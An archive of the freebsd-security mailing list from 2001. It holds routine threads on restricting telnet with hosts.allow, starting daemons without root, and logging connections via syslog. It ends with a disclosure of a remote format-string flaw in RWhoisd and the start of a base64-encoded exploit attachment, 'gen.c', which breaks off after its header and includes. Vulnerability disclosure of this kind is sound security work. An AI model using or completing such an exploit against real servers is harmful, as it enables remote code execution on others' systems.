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 ------=_NextPart_000_000A_01C15CD4.D549F2E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 22: 7:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from loverboy.highspeedweb.net (loverboy.highspeedweb.net [204.181.12.40]) by hub.freebsd.org (Postfix) with SMTP id 43BA137B403 for ; Wed, 24 Oct 2001 22:07:09 -0700 (PDT) Received: (qmail 13254 invoked by uid 510); 25 Oct 2001 05:07:00 -0000 Received: from unknown (HELO padjajaran) (202.150.91.162) by progs4wealth.com with SMTP; 25 Oct 2001 05:07:00 -0000 Message-ID: <00c601c15d13$8dd17200$ab5b96ca@padjajaran> From: "Purwa Riadi" To: "David" , References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> Subject: Re: telnet limitation Date: Thu, 25 Oct 2001 12:11:36 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was try to set the hosts.deny and hosts.allow like below #more /etc/hosts.allow ALL : 127.0.0.1 localhost ALL : 202.159.35.125 ALL : 202.159.35.126 # more /etc/hosts.deny ALL : ALL But, I can still telnet from all of host in my network. The rules in both of file didn't give impact at all for my machine(3.3-RELEASE FreeBSD 3.3-RELEASE). What should I do now....? Also, if I wanna upgrade the server to 4.3-Release...Is it save way for may data and setting like natd setting? Thx and regards Purwa R ----- Original Message ----- From: "David" To: "Purwa Riadi" ; Sent: Wednesday, October 24, 2001 4:14 PM Subject: Re: telnet limitation > hi, > > try using tcp wrappers.. it is build into FreeBSD. > look at hosts.allow > > ----- Original Message ----- > From: "Purwa Riadi" > To: > Sent: Wednesday, October 24, 2001 5:07 PM > Subject: telnet limitation > > > > Dear FreeBSDer, > > > > If I wanna give rules in my server, therefore just certain IP that can > > telnet to my server, whats scripts that should I change and configure? > > Anyone can explain to me? > > > > > > thx & regards > > > > Purwa > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 22:21:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id 3C0E037B403 for ; Wed, 24 Oct 2001 22:21:42 -0700 (PDT) Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f9P5JcX01331; Thu, 25 Oct 2001 01:19:38 -0400 (EDT) (envelope-from aschneid) Date: Thu, 25 Oct 2001 01:19:38 -0400 From: Anthony Schneider To: Purwa Riadi Cc: David , freebsd-security@FreeBSD.ORG Subject: Re: telnet limitation Message-ID: <20011025011938.A1299@mail.slc.edu> References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> <00c601c15d13$8dd17200$ab5b96ca@padjajaran> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00c601c15d13$8dd17200$ab5b96ca@padjajaran>; from purwa@progs4wealth.com on Thu, Oct 25, 2001 at 12:11:36PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I believe that the hosts.deny file is deprecated, and that rtules should now be specified in /etc/hosts.allow. This is a 3.3-RELEASE box we're talking about, which I'm not too sure of, but you can specify IP addresses which can access telnet on your host by specifying rules in your /etc/hosts.allow file such as: ALL : 127.0.0.1 : allow telnetd : 202.169.35.125 : allow ALL : ALL : deny What this effectively does is allow all connections from localhost to localhost for any service, and deny everything for every host except for 202.159.35.125 accessing telnetd. -Anthony. On Thu, Oct 25, 2001 at 12:11:36PM +0700, Purwa Riadi wrote: > > I was try to set the hosts.deny and hosts.allow like below > > #more /etc/hosts.allow > ALL: 127.0.0.1 localhost > ALL: 202.159.35.125 > ALL: 202.159.35.126 > > # more /etc/hosts.deny > ALL: ALL > > But, I can still telnet from all of host in my network. The rules in both of > file didn't give impact at all for my machine(3.3-RELEASE FreeBSD > 3.3-RELEASE). > What should I do now....? > > Also, if I wanna upgrade the server to 4.3-Release...Is it save way for may > data and setting like natd setting? > > Thx and regards > > Purwa R > > > ----- Original Message ----- > From: "David" > To: "Purwa Riadi" ; > Sent: Wednesday, October 24, 2001 4:14 PM > Subject: Re: telnet limitation > > > > hi, > > > > try using tcp wrappers.. it is build into FreeBSD. > > look at hosts.allow > > > > ----- Original Message ----- > > From: "Purwa Riadi" > > To: > > Sent: Wednesday, October 24, 2001 5:07 PM > > Subject: telnet limitation > > > > > > > Dear FreeBSDer, > > > > > > If I wanna give rules in my server, therefore just certain IP that can > > > telnet to my server, whats scripts that should I change and configure? > > > Anyone can explain to me? > > > > > > > > > thx & regards > > > > > > Purwa > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 23:28:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id B599E37B406 for ; Wed, 24 Oct 2001 23:27:53 -0700 (PDT) Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f9P6Qke02055; Thu, 25 Oct 2001 02:26:46 -0400 (EDT) (envelope-from aschneid) Date: Thu, 25 Oct 2001 02:26:46 -0400 From: Anthony Schneider To: Purwa Riadi Cc: freebsd-security@freebsd.org Subject: Re: telnet limitation Message-ID: <20011025022646.A2029@mail.slc.edu> References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> <00c601c15d13$8dd17200$ab5b96ca@padjajaran> <20011025011938.A1299@mail.slc.edu> <00dd01c15d1d$f5b55120$ab5b96ca@padjajaran> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00dd01c15d1d$f5b55120$ab5b96ca@padjajaran>; from purwa@progs4wealth.com on Thu, Oct 25, 2001 at 01:26:13PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm not sure how to go about logging connections to telnetd. Perhaps someone else here knows. -Anthony. On Thu, Oct 25, 2001 at 01:26:13PM +0700, Purwa Riadi wrote: > Dear Anthony, > > Thanks for your advice, and now the rules is working in my machine. telnetd > is the key that make setting true.... > Also,can I ask again :-) > Where is the location of log file telnet? So, I can know who try to telnet > to my machine. > > thx & rgds > > Purwa > > > > ----- Original Message ----- > From: "Anthony Schneider" > To: "Purwa Riadi" > Cc: "David" ; > Sent: Thursday, October 25, 2001 12:19 PM > Subject: Re: telnet limitation > > > > I believe that the hosts.deny file is deprecated, and that rtules should > now be > > specified in /etc/hosts.allow. This is a 3.3-RELEASE box we're talking > about, > > which I'm not too sure of, but you can specify IP addresses which can > access > > telnet on your host by specifying rules in your /etc/hosts.allow file such > as: > > > > ALL : 127.0.0.1 : allow > > telnetd : 202.169.35.125 : allow > > ALL : ALL : deny > > > > What this effectively does is allow all connections from localhost to > localhost > > for any service, and deny everything for every host except for > 202.159.35.125 > > accessing telnetd. > > -Anthony. > > > > On Thu, Oct 25, 2001 at 12:11:36PM +0700, Purwa Riadi wrote: > > > > > > I was try to set the hosts.deny and hosts.allow like below > > > > > > #more /etc/hosts.allow > > > ALL: 127.0.0.1 localhost > > > ALL: 202.159.35.125 > > > ALL: 202.159.35.126 > > > > > > # more /etc/hosts.deny > > > ALL: ALL > > > > > > But, I can still telnet from all of host in my network. The rules in > both of > > > file didn't give impact at all for my machine(3.3-RELEASE FreeBSD > > > 3.3-RELEASE). > > > What should I do now....? > > > > > > Also, if I wanna upgrade the server to 4.3-Release...Is it save way for > may > > > data and setting like natd setting? > > > > > > Thx and regards > > > > > > Purwa R > > > > > > > > > ----- Original Message ----- > > > From: "David" > > > To: "Purwa Riadi" ; > > > > Sent: Wednesday, October 24, 2001 4:14 PM > > > Subject: Re: telnet limitation > > > > > > > > > > hi, > > > > > > > > try using tcp wrappers.. it is build into FreeBSD. > > > > look at hosts.allow > > > > > > > > ----- Original Message ----- > > > > From: "Purwa Riadi" > > > > To: > > > > Sent: Wednesday, October 24, 2001 5:07 PM > > > > Subject: telnet limitation > > > > > > > > > > > > > Dear FreeBSDer, > > > > > > > > > > If I wanna give rules in my server, therefore just certain IP that > can > > > > > telnet to my server, whats scripts that should I change and > configure? > > > > > Anyone can explain to me? > > > > > > > > > > > > > > > thx & regards > > > > > > > > > > Purwa > > > > > > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 23:33:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181172.resnet.ucsb.edu (R181172.resnet.ucsb.edu [128.111.181.172]) by hub.freebsd.org (Postfix) with ESMTP id 088AC37B405 for ; Wed, 24 Oct 2001 23:33:33 -0700 (PDT) Received: from localhost (mudman@localhost) by R181172.resnet.ucsb.edu (8.11.6/8.11.6) with ESMTP id f9P6aGN18005 for ; Wed, 24 Oct 2001 23:36:16 -0700 (PDT) (envelope-from mudman@R181172.resnet.ucsb.edu) Date: Wed, 24 Oct 2001 23:36:16 -0700 (PDT) From: Dave To: Subject: lowering uids, startup Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I am interested in learning how to start up a program (a 3rd party server program, a daemon, whatever) automatically from boot up without using inetd and without using a root uid. I do know that /usr/local/etc/rc.d/ (mostly from my ports downloads) will automatically run packages such as ssh and apache, and really anything you put in there. Unfortunately, these things initially run as root, so I'm skeptical about using it. Are there any good, safe, secure ways to automatically start up third party services in really low privileged environments? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 23:44: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from science.slc.edu (Science.SLC.Edu [198.83.6.248]) by hub.freebsd.org (Postfix) with ESMTP id 58E5A37B40A for ; Wed, 24 Oct 2001 23:43:53 -0700 (PDT) Received: (from aschneid@localhost) by science.slc.edu (8.11.0/8.11.0) id f9P6gk202196; Thu, 25 Oct 2001 02:42:46 -0400 (EDT) (envelope-from aschneid) Date: Thu, 25 Oct 2001 02:42:41 -0400 From: Anthony Schneider To: Dave Cc: freebsd-security@FreeBSD.ORG Subject: Re: lowering uids, startup Message-ID: <20011025024241.A2163@mail.slc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mudman@R181172.resnet.ucsb.edu on Wed, Oct 24, 2001 at 11:36:16PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org you may create a /usr/local/etc/rc.d/ script which simply has su -c "command" user in it, where user is the unprivileged user you want the program to run under, and command is a quote string of the full command and arguments. For example: su -c "ls /root" nobody will execute the command "ls /root" as user nobody. This is a pretty lame example, because you wouldn't want it in a startup script, and because I don't think /root is permed against non-root users, but you see what I mean. :) -Anthony. On Wed, Oct 24, 2001 at 11:36:16PM -0700, Dave wrote: > > I am interested in learning how to start up a program (a 3rd party server > program, a daemon, whatever) automatically from boot up without using > inetd and without using a root uid. > > I do know that /usr/local/etc/rc.d/ (mostly from my ports downloads) will > automatically run packages such as ssh and apache, and really anything you > put in there. Unfortunately, these things initially run as root, so I'm > skeptical about using it. > > Are there any good, safe, secure ways to automatically start up third > party services in really low privileged environments? > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 23:47:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from sbtx.tmn.ru (sbtx.tmn.ru [212.76.160.49]) by hub.freebsd.org (Postfix) with ESMTP id A53D637B401 for ; Wed, 24 Oct 2001 23:47:05 -0700 (PDT) Received: from sv.tech.sibitex.tmn.ru (sv.tech.sibitex.tmn.ru [212.76.160.59]) by sbtx.tmn.ru (8.11.3/8.11.3) with ESMTP id f9P6l2k72039; Thu, 25 Oct 2001 12:47:03 +0600 (YEKST) (envelope-from serg@sbtx.tmn.ru) Received: (from serg@localhost) by sv.tech.sibitex.tmn.ru (8.11.6/8.11.6) id f9P6l2p41975; Thu, 25 Oct 2001 12:47:02 +0600 (YEKST) (envelope-from serg) Date: Thu, 25 Oct 2001 12:47:02 +0600 From: "Sergey N. Voronkov" To: Dave Cc: freebsd-security@FreeBSD.ORG Subject: Re: lowering uids, startup Message-ID: <20011025124702.A41897@sv.tech.sibitex.tmn.ru> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mudman@R181172.resnet.ucsb.edu on Wed, Oct 24, 2001 at 11:36:16PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Oct 24, 2001 at 11:36:16PM -0700, Dave wrote: > > I am interested in learning how to start up a program (a 3rd party server > program, a daemon, whatever) automatically from boot up without using > inetd and without using a root uid. % man inetd.conf [skip] the beginning of a line. There must be an entry for each field. The fields of the configuration file are as follows: service name socket type protocol {wait|nowait}[/max-child[/max-connections-per-ip-per-minute]] user[:group][/login-class] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Exactly what do you need. server program server program arguments > I do know that /usr/local/etc/rc.d/ (mostly from my ports downloads) will > automatically run packages such as ssh and apache, and really anything you > put in there. Unfortunately, these things initially run as root, so I'm > skeptical about using it. % man su [skip] su [-] [-Kflm] [-c class] [login [args]] DESCRIPTION Su requests the Kerberos password for login (or for `login.root'', if no login is provided), and switches to that user and group ID after obtain- ing a Kerberos ticket granting ticket. A shell is then executed. Su will resort to the local password file to find the password for login if there is a Kerberos error. If su is executed by root, no password is requested and a shell with the appropriate user ID is executed; no addi- tional Kerberos tickets are obtained. [skip] -l Simulate a full login. The environment is discarded except for HOME, SHELL, PATH, TERM, and USER. HOME and SHELL are modified as above. USER is set to the target login. PATH is set to `/bin:/usr/bin''. TERM is imported from your current environ- ment. Environment variables may be set or overridden from the login class capabilities database according to the class of the target login. The invoked shell is the target login's, and su will change directory to the target login's home directory. Resource limits and session priority are modified to that for the target account's login class. - (no letter) The same as -l. Example to your usage: su - www telnetd -debug 2021 Good Luck! Serg N. Voronkov, Tyumen, Russia. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 23:53:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from oxmail.ox.ac.uk (oxmail4.ox.ac.uk [163.1.2.33]) by hub.freebsd.org (Postfix) with ESMTP id C5DBE37B40A for ; Wed, 24 Oct 2001 23:53:18 -0700 (PDT) Received: from heraldgate2.oucs.ox.ac.uk ([163.1.2.50] helo=frontend2.herald.ox.ac.uk ident=exim) by oxmail.ox.ac.uk with esmtp (Exim 3.12 #1) id 15weO9-0006np-04; Thu, 25 Oct 2001 07:53:13 +0100 Received: from dhcp85.wadham.ox.ac.uk ([163.1.164.212] helo=piii600.wadham.ox.ac.uk) by frontend2.herald.ox.ac.uk with esmtp (Exim 3.32 #1) id 15weO9-0000GG-00; Thu, 25 Oct 2001 07:53:13 +0100 Reply-To: cperciva@sfu.ca Message-Id: <5.0.2.1.1.20011025075053.00b1af50@popserver.sfu.ca> X-Sender: cperciva@popserver.sfu.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Thu, 25 Oct 2001 07:53:12 +0100 To: Dave , From: Colin Percival Subject: Re: lowering uids, startup In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 23:36 24/10/2001 -0700, Dave wrote: >Are there any good, safe, secure ways to automatically start up third >party services in really low privileged environments? Use the @reboot time setting in the user's crontab(5) file. Colin Percival To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 25 0:31: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from tngent02.tng.tmn.ru (ns.tng.tmn.ru [212.76.168.162]) by hub.freebsd.org (Postfix) with ESMTP id 4F2EB37B401 for ; Thu, 25 Oct 2001 00:30:57 -0700 (PDT) Received: from tng.tmn.ru ([10.28.66.204]) by tngent02.tng.tmn.ru (8.11.6/8.11.6) with ESMTP id f9P7SZJ11011; Thu, 25 Oct 2001 13:28:36 +0600 (YEKST) (envelope-from igor@tng.tmn.ru) Message-ID: <3BD7BEA3.8090607@tng.tmn.ru> Date: Thu, 25 Oct 2001 13:26:27 +0600 From: "Igor I. Ushatinsky" User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.4) Gecko/20011022 X-Accept-Language: ru, en-us MIME-Version: 1.0 To: Anthony Schneider Cc: Purwa Riadi , freebsd-security@FreeBSD.ORG Subject: Re: telnet limitation References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> <000701c15c6c$5271d620$0900000a@web.cc> <00c601c15d13$8dd17200$ab5b96ca@padjajaran> <20011025011938.A1299@mail.slc.edu> <00dd01c15d1d$f5b55120$ab5b96ca@padjajaran> <20011025022646.A2029@mail.slc.edu> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Good day! Anthony Schneider wrote: > I'm not sure how to go about logging connections to telnetd. > Perhaps someone else here knows. Add this to your /etc/syslog.conf: auth.* /var/log/auth.log Don't forget to touch the target file and send -HUP to syslogd :-) Also you may want to add auth.log rotation to /etc/newsyslog.conf. /Igor I. Ushatinsky, Russia, Siberia, Tyumen. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 25 7:27:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from cow.net (ppp3-76.aquanet.co.il [192.117.247.76]) by hub.freebsd.org (Postfix) with ESMTP id 32B8337B401 for ; Thu, 25 Oct 2001 07:27:18 -0700 (PDT) Received: from localhost (root@localhost) by cow.net (8.9.3/8.9.3) with ESMTP id TAA05048 for ; Thu, 25 Oct 2001 19:25:52 +0200 Date: Thu, 25 Oct 2001 19:25:51 +0200 (IST) From: root To: freebsd-security@freebsd.org Subject: RWhoisd remote format string vulnerability Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-1200701191-1004030751=:5027" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --8323328-1200701191-1004030751=:5027 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, there is a serious bug in RWhoisd by NSI on all versions. it is possible for a user to supply the format string passed to print_error() simpley by using the "-soa" directive. the results are obvious, we can write almost anywhere in the proc's memory thus executing code as the user running rwhoisd. (usually rwhoisd , but can easily become root if rwhoisd.conf writeable) --8323328-1200701191-1004030751=:5027 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="gen.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="gen.c" LyogDQogICAgICAgMTcuNC4yMDAxICAgICAgICANCg0KICAgICAgIFJlbW90 ZSBFeHBsb2l0IGZvciB2ZXJzaW9ucyBvZg0KICAgICAgIFJXaG9pc2QgLi4u IChieSBOZXR3b3JrIFNvbHV0aW9ucywgSW5jLiBWLTEuNS54KSANCiAgICAg IA0KICAgICAgIHRoaXMgY29kZSBleHBsb2l0cyBhIGJ1ZyBpbiB0aGUgJy1z b2EnIGRpcmVjdGl2ZSANCiAgICAgICB0aGF0IGNhbGxzIHByaW50X2Vycm9y KCkgd2l0aCBhIHVzZXIgc3VwcGxpZWQgDQogICAgICAgZm9ybWF0IHN0cmlu Zy4NCg0KICAgICAgIGNyZWRpdCB0byByb2Igd2hvIGZvdW5kIHRoZSBoMGxl IA0KICAgICAgIGFuZCBtYWQgdGhhbmtzIHRvIGFsbCB0aGUgcGVvcGxlIHdo byBoZWxwZWQgbWUNCiAgICAgICB0ZXN0IHRoaXMgY29kZS4gICAgICAgDQoN CiAgICAgICB0aGVzZSB2ZXJzaW9ucyBhcmUgdnVsbmVyYWJsZSBvbiBhbGwg cGxhdGZvcm1zDQogICAgICAgbm90IG9ubHkgdGhlIG9uZXMgYXZhaWxhYmxl IGhlcmUuDQoNCiAgICAgICB5b3UgYmV0dGVyIHRyeSBtb3JlIHRoYW4gb25j ZSAsIGZvciBzb21lIHJlYXNvbg0KICAgICAgIGlmIHNvbWV0aW1lcyBmYWls cyBvbiBmaXJzdCBhdHRlbXB0cy4NCg0KICAgICAgIFRISVMgQ09ERSBJUyBG T1IgRURVQ0FUSU9OQUwgUFVSUE9TRVMgT05MWQ0KICAgICAgIA0KICAgICAg IGhhdmUgcGh1biwgQ293UG93ZXIuDQogICAgICAgDQoqLw0KDQojaW5jbHVk ZSA8c2lnbmFsLmg+DQojaW5jbHVkZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8 c3RkaW8uaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+DQojaW5jbHVkZSA8 